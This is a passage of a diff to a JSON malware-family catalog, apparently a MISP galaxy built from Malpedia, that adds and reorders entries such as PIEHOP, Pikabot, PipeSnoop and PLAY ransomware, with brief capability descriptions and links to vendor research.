"https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", - "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "synonyms": [], "type": [] @@ -37561,6 +39321,19 @@ "uuid": "2eb298de-e14b-46c1-a45f-26ae0d2c4003", "value": "PICKPOCKET" }, + { + "description": "According to Mandiant, PIEHOP is a disruption tool written in Python and packaged with PyInstaller version 2.1+ that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU.\r\nPIEHOP expects its main function to be called via another Python file, supplying either the argument control=True or upload=True. At a minimum, it requires the following arguments: oik, user, and pwd, and if called with control=True, it must also be supplied with iec104.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.piehop", + "https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2b025b03-9241-4fe4-b691-46c7bace87e4", + "value": "PIEHOP" + }, { "description": "", "meta": { @@ -37576,12 +39349,14 @@ "value": "Pierogi" }, { - "description": "", + "description": "Introducing Pikabot, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. Despite being in the early stages of development, it already demonstrates advanced techniques in evasion, injection, and anti-analysis. Notably, the loader component incorporates an array of sophisticated anti-debugging and anti-VM measures inspired by the open-source Al-Khaser project, while leveraging steganography to conceal its payload. Additionally, Pikabot utilizes a proprietary C2 framework and supports a diverse range of commands, encompassing host enumeration and advanced secondary payload injection options.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot", + "https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot", + "https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398", "https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/", - "https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398" + "https://d01a.github.io/pikabot/" ], "synonyms": [], "type": [] @@ -37594,9 +39369,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html", "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/" ], "synonyms": [], "type": [] @@ -37605,7 +39381,7 @@ "value": "PILLOWMINT" }, { - "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.", + "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke\u2019s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke", @@ -37622,8 +39398,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pingback", - "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/" + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/", + "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/" ], "synonyms": [], "type": [] @@ -37649,8 +39425,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon", - "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", - "https://twitter.com/ESETresearch/status/1506904404225630210" + "https://twitter.com/ESETresearch/status/1506904404225630210", + "https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html", + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" ], "synonyms": [], "type": [] @@ -37658,6 +39435,19 @@ "uuid": "34c0b51a-7139-44ab-b09a-cef646e66ba0", "value": "PipeMon" }, + { + "description": "Cisco Talos states that PipeSnoop can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipesnoop", + "https://blog.talosintelligence.com/introducing-shrouded-snooper/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "29e75560-d16f-4434-a6a5-0258a916103d", + "value": "PipeSnoop" + }, { "description": "Infostealer", "meta": { @@ -37676,11 +39466,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", + "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/", "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", - "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-mayfair" ], "synonyms": [ "CookieCutter", @@ -37696,11 +39486,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", - "https://isc.sans.edu/diary/rss/25068", - "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf", - "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", "http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.565.9211&rep=rep1&type=pdf", - "https://johannesbader.ch/2019/07/the-dga-of-pitou/" + "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", + "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf", + "https://johannesbader.ch/2019/07/the-dga-of-pitou/", + "https://isc.sans.edu/diary/rss/25068" ], "synonyms": [], "type": [] @@ -37727,8 +39517,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", - "http://blog.kleissner.org/?p=788", - "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" + "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot", + "http://blog.kleissner.org/?p=788" ], "synonyms": [ "Bublik", @@ -37745,9 +39535,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", + "https://unit42.paloaltonetworks.com/atoms/rancortaurus/", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://unit42.paloaltonetworks.com/atoms/rancortaurus/", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook" ], "synonyms": [], @@ -37757,21 +39547,23 @@ "value": "PLAINTEE" }, { - "description": "Ransomware", + "description": "According to PCrisk, PLAY is the name of a ransomware-type program. Malware categorized as such operates by encrypting data and demanding ransoms for the decryption.\r\n\r\nAfter we executed a sample of this ransomware on our test machine, it encrypted files and appended their filenames with a \".PLAY\" extension. For example, a file titled \"1.jpg\" appeared as \"1.jpg.PLAY\", \"2.png\" as \"2.png.PLAY\", etc. Once the encryption process was completed, PLAY created a text file named \"ReadMe.txt\" on the desktop.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.play", - "https://www.orangecyberdefense.com/global/blog/playing-the-game", - "https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/", - "https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy", "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", - "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65" + "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", + "https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play", + "https://www.orangecyberdefense.com/global/blog/playing-the-game", + "https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware", + "https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/" ], "synonyms": [ "PlayCrypt" @@ -37799,29 +39591,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", - "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/", - "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", - "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", - "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", - "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", - "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", - "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", + "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", + "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", - "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", - "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html", - "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf", - "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", + "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html", - "http://www.freebuf.com/column/159865.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", + "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", + "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html", "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/", + "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html", + "http://www.freebuf.com/column/159865.html" ], "synonyms": [ "DRAWDOWN", @@ -37838,13 +39630,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", + "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", - "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html", "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", "https://www.crowdstrike.com/blog/ploutus-atm-malware-deobfuscation-case-study", - "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", - "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" + "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam" ], "synonyms": [], "type": [] @@ -37871,175 +39663,184 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", - "https://asec.ahnlab.com/en/49097/", - "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", "https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware", - "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", - "https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers", - "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", + "https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html", + "https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://community.rsa.com/thread/185439", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "https://www.youtube.com/watch?v=6SDdUVejR2w", + "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european", + "https://www.contextis.com/en/blog/avivore", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://unit42.paloaltonetworks.com/thor-plugx-variant/", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/", + "https://www.recordedfuture.com/china-linked-ta428-threat-group", + "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", + "https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://twitter.com/stvemillertime/status/1261263000960450562", + "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor", + "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx", + "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf", + "https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/", + "https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution", + "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", + "https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html", + "https://www.mandiant.com/resources/blog/infected-usb-steal-secrets", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.contextis.com/de/blog/avivore", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html", - "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/", - "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", - "https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/", - "https://risky.biz/whatiswinnti/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf", - "https://blog.xorhex.com/blog/mustangpandaplugx-1/", - "https://www.youtube.com/watch?v=E2_DTQJjDYc", - "https://securelist.com/cycldek-bridging-the-air-gap/97157/", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", - "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", - "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", - "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", - "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/", - "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", - "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", - "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", - "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-express", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/", - "https://engineers.ffri.jp/entry/2022/11/30/141346", - "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", - "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims", - "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://blog.xorhex.com/blog/reddeltaplugxchangeup/", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://www.macnica.net/file/security_report_20160613.pdf", "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/", - "https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf", - "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html", - "https://www.contextis.com/en/blog/avivore", - "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf", - "https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html", - "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", - "https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/", - "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european", - "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", - "https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://www.youtube.com/watch?v=IRh6R8o1Q7U", - "https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/", - "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", - "https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf", - "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", - "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", - "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", - "https://securelist.com/time-of-death-connected-medicine/84315/", - "https://tracker.h3x.eu/info/290", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", - "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", - "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", - "https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/", - "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", - "https://attack.mitre.org/groups/G0096", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", - "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", - "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", - "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", - "https://www.youtube.com/watch?v=C_TmANnbS2k", - "https://www.secureworks.com/research/bronze-president-targets-ngos", - "https://community.rsa.com/thread/185439", - "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", - "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/", - "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/", - "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", - "https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf", - "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", - "https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf", - "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-olive", - "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://www.contextis.com/en/blog/dll-search-order-hijacking", - "https://www.youtube.com/watch?v=6SDdUVejR2w", - "https://unit42.paloaltonetworks.com/unsigned-dlls/", - "https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/", - "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx", - "https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/", - 